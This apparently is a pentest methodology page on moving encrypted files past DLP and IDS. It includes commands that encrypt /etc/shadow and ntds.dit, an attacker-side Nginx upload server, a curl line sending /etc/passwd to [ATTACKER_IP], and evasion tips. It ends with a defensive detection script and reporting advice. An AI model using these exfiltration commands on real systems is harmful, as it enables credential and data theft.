Methodology Checklist
- Confirm standard HTTP is blocked or monitored
- HTTPS server: `openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 1 -out cert.pem && python3 -c "...ssl wrap..."`
- PowerShell HTTPS download (skip cert check): `-SkipCertificateCheck` flag (PS 7+) or `[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}`
- SMB over TLS: use `impacket-smbserver` with `-smb2support`
- Verify transfer completed and clean up server
Operational Context
Use when: Network monitoring is present and plaintext HTTP transfers would be detected or DLP would inspect content; use encrypted channels (HTTPS, SCP, SMB signing).
Think Dumber First: HTTPS Python server takes 2 extra minutes to set up: `openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 1 -nodes -subj '/CN=localhost'` then `python3 -c "import http.server,ssl; ..."`. Worth it on monitored networks.
Skip when: Lab environment with no network monitoring; stick with HTTP for speed.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc` | Encrypt file with AES-256 + PBKDF2 (Linux) |
| `openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd` | Decrypt AES-256 PBKDF2 file (Linux) |
| `Import-Module .\Invoke-AESEncryption.ps1` | Load AES encryption module (Windows) |
| `Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt` | Encrypt file on Windows (outputs .aes) |
| `Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\scan-results.txt.aes` | Decrypt AES file on Windows |
| `sudo mkdir -p /var/www/uploads/SecretUploadDirectory` | Create upload directory for Nginx catch server |
| `sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory` | Set permissions for Nginx web user |
| `sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/` | Enable Nginx upload site |
| `sudo systemctl restart nginx.service` | Restart Nginx after configuration |
| `curl -T /etc/passwd http://[TARGET_IP]:9001/SecretUploadDirectory/users.txt` | Upload file to Nginx PUT endpoint |
| `tail -2 /var/log/nginx/error.log` | Check Nginx errors if upload fails |
| `sudo rm /etc/nginx/sites-enabled/default` | Remove conflicting default Nginx site |
Deep Dive & Workflow
When to Use Encrypted Transfers
During engagements, sensitive files (NTDS.dit, SAM, credentials, PII) must be protected in transit. Encrypted transfers bypass:
- Network DLP (Data Loss Prevention) inspection
- IDS signatures that detect cleartext credential patterns
- Content-based egress filters
Linux: OpenSSL AES-256
```sh
# Encrypt (on victim before exfil)
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/shadow -out shadow.enc
# Transfer via any method (nc, curl, scp)
# Decrypt on attacker
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in shadow.enc -out shadow
```
`-pbkdf2` together with `-iter 100000` makes the password-to-key derivation brute-force resistant. Always use a strong password.
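The following script is an added example and is not from the original page. It wraps the openssl settings above (AES-256, PBKDF2, 100000 iterations) in small functions, runs an encrypt/decrypt round trip on a constructed sample file, and proves the decrypted copy is byte-identical by comparing SHA-256 digests, which is the "verify transfer completed" check the methodology list calls for. It also shows that a different passphrase never yields the plaintext. The environment variable name `OPENSSL_PASS` and the default passphrase are assumptions made for this example; `-pass env:` is a real openssl option.

```shell
#!/bin/sh
# Added example, not from the original page: encrypt with the page's openssl
# settings (AES-256, PBKDF2, 100000 iterations), decrypt, and prove the copy is
# byte-identical via SHA-256, which is the "verify transfer completed" check.
# The passphrase comes from the environment variable OPENSSL_PASS (a name chosen
# for this example) so nothing is typed interactively or left in shell history
# as a command-line argument.
set -eu

# Constructed default passphrase for a stand-alone run; override it in practice.
OPENSSL_PASS="${OPENSSL_PASS:-constructed-example-passphrase}"
export OPENSSL_PASS

# Same cipher options on both sides; -iter already implies -pbkdf2, but both are
# kept explicit, as on the page, so the intent is obvious when reading the command.
CIPHER_OPTS="-aes256 -iter 100000 -pbkdf2"

# encrypt_file SRC DST: encrypt SRC into DST with a random salt (the default).
encrypt_file() {
    openssl enc $CIPHER_OPTS -salt -in "$1" -out "$2" -pass env:OPENSSL_PASS
}

# decrypt_file SRC DST: decrypt SRC into DST with the same settings.
decrypt_file() {
    openssl enc -d $CIPHER_OPTS -in "$1" -out "$2" -pass env:OPENSSL_PASS
}

# sha256_of FILE: print only the hex digest (openssl dgst, no coreutils needed).
sha256_of() {
    openssl dgst -sha256 -r "$1" | cut -d' ' -f1
}

# roundtrip_check: encrypt a constructed sample, decrypt it, compare digests.
# Prints OK when the decrypted file matches the original, MISMATCH otherwise.
roundtrip_check() {
    work=$(mktemp -d)
    printf 'constructed sample line, not real data\n' > "$work/sample.txt"
    encrypt_file "$work/sample.txt" "$work/sample.enc"
    decrypt_file "$work/sample.enc" "$work/sample.dec"
    if [ "$(sha256_of "$work/sample.txt")" = "$(sha256_of "$work/sample.dec")" ]; then
        result=OK
    else
        result=MISMATCH
    fi
    rm -rf "$work"
    echo "$result"
}

# wrong_pass_check: decrypting with a different passphrase must never yield the
# plaintext. openssl usually exits non-zero ("bad decrypt") here; the digest
# comparison also covers the rare case where the CBC padding happens to validate.
wrong_pass_check() {
    work=$(mktemp -d)
    printf 'constructed sample line, not real data\n' > "$work/sample.txt"
    encrypt_file "$work/sample.txt" "$work/sample.enc"
    result=REJECTED
    if OPENSSL_PASS=not-the-real-passphrase \
       openssl enc -d $CIPHER_OPTS -in "$work/sample.enc" -out "$work/sample.dec" \
       -pass env:OPENSSL_PASS 2>/dev/null \
       && [ "$(sha256_of "$work/sample.txt")" = "$(sha256_of "$work/sample.dec")" ]; then
        result=PLAINTEXT-RECOVERED
    fi
    rm -rf "$work"
    echo "$result"
}

# Stand-alone run: print both verdicts.
echo "round trip: $(roundtrip_check)"
echo "wrong passphrase: $(wrong_pass_check)"
```

Compare the digest printed by `sha256_of` on both ends of a transfer; a matching digest after decryption is the only reliable sign that the encrypted blob arrived intact, since a truncated `.enc` file can still decrypt partially without an obvious error.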
Windows: Invoke-AESEncryption PowerShell Script
The script must be copied to the target first (via file transfer), then imported:
```powershell
# Import
Import-Module .\Invoke-AESEncryption.ps1
# Encrypt
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\ntds.dit
# Creates: ntds.dit.aes
# Also works on strings
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Text "SecretPassword"
```
Nginx HTTPS Catch Server (Attacker-Side Setup)
For stealthy HTTPS-based file exfiltration from victims:
Nginx config (/etc/nginx/sites-available/upload.conf):
```nginx
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}
```
Note that this config as shown accepts plaintext HTTP on port 9001 and does not itself terminate TLS; the "HTTPS" in the section title is not provided by this snippet alone, and the upload command below also uses `http://`.
Victim uploads with:
```sh
curl -T /etc/passwd http://[ATTACKER_IP]:9001/SecretUploadDirectory/loot.txt
```
Verify receipt:
```sh
ls -l /var/www/uploads/SecretUploadDirectory/
```
OPSEC Notes
- Never exfiltrate real PII during authorized testing without explicit scope approval
- Use dummy files with fake PII when testing DLP egress filtering
- Encrypt before transfer; don't rely on transport encryption alone if data is highly sensitive
- Use a unique strong password per engagement; a leaked password exposes all encrypted loot
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| openssl self-signed cert rejected by wget | SSL verify by default | Add `--no-check-certificate` to wget or `-k` to curl |
| SCP transfer fails with host key error | New host, no known_hosts entry | Add `-o StrictHostKeyChecking=no` to bypass (lab only, not for production) |
| HTTPS Python server setup complex | SSL module errors | Use updog or sslserver Python package: `pip3 install updog; updog -p 443 --ssl` |
| SMB transfer blocked | Port 445 firewalled | Use SMB over QUIC (Windows 11) or pivot: impacket-smbserver via established tunnel |
| Encrypted transfer still detected | DPI doing cert inspection | Use a valid Let's Encrypt cert on VPS; self-signed certs trigger DPI inspection alerts |
Reporting Trigger
Finding Title: Encrypted File Transfer Channel Evades DLP Inspection
Impact: TLS-encrypted file transfers prevent content-based DLP inspection, allowing payload delivery and data exfiltration to bypass security controls that rely on inspecting plaintext transfer content.
Root Cause: Network monitoring limited to plaintext protocols. No SSL/TLS inspection (or inspection limited by certificate pinning/privacy policy).
Recommendation: Implement SSL/TLS inspection at the perimeter for outbound traffic from server workloads. Alert on connections to unknown external IPs over 443. Deploy endpoint DLP in addition to network DLP.
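As an added example that is not part of the original page, the following script implements the recommendation's "alert on connections to unknown external IPs over 443" as a detection over an egress log. The log format (timestamp, source, destination, destination port, protocol, action), the allowlist, and every address in the sample are constructed for this example and are not taken from any real environment; the allowlist is the piece a defender must populate from the server workloads' known dependencies.

```shell
#!/bin/sh
# Added example, not from the original page: a minimal implementation of the
# report's recommendation to alert on outbound 443 connections from server
# workloads to destinations that are not known. The log line format, the
# allowlist and all addresses are constructed for this example.
set -eu

# Constructed firewall/egress log: six whitespace-separated fields per line
# (timestamp src dst dport proto action).
SAMPLE_LOG='2024-05-01T10:00:01Z 10.0.5.12 203.0.113.10 443 tcp allow
2024-05-01T10:00:02Z 10.0.5.40 198.51.100.7 443 tcp allow
2024-05-01T10:00:03Z 10.0.5.40 192.168.1.5 445 tcp allow
2024-05-01T10:00:04Z 10.0.5.40 198.51.100.7 443 tcp allow
2024-05-01T10:00:05Z 10.0.5.12 203.0.113.10 443 tcp allow
2024-05-01T10:00:06Z 10.0.5.77 192.0.2.200 443 tcp allow'

# Destinations that servers are expected to reach over TLS, one per line
# (constructed; in practice derived from update servers, SaaS, monitoring, etc.).
ALLOWLIST='203.0.113.10'

# flag_unknown_443 LOG ALLOWLIST: print "count source destination" for every
# source/destination pair on port 443 whose destination is not allowlisted,
# busiest pair first. RFC 1918 destinations are treated as internal and skipped.
flag_unknown_443() {
    printf '%s\n' "$1" | awk -v allow="$2" '
        BEGIN { n = split(allow, a, "\n"); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $4 != 443 { next }                                              # TLS egress only
        $3 ~ /^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/ { next }  # internal destination
        $3 in ok { next }                                               # known-good destination
        { hits[$2 " " $3]++ }
        END { for (k in hits) print hits[k], k }
    ' | sort -rn
}

# alert_count LOG ALLOWLIST: number of distinct unknown (source, destination) pairs.
alert_count() {
    flag_unknown_443 "$1" "$2" | wc -l | tr -d ' '
}

# Stand-alone run on the constructed log: expected to list
# 10.0.5.40 -> 198.51.100.7 (2 connections) and 10.0.5.77 -> 192.0.2.200 (1).
flag_unknown_443 "$SAMPLE_LOG" "$ALLOWLIST"
```

Aggregating per source/destination pair rather than per line keeps the alert volume proportional to the number of unexpected peers, not the number of connections, and the count column gives a first triage signal: a single connection may be a one-off, while a sustained series to one unknown IP over 443 is the pattern this page's transfer techniques would produce on the wire.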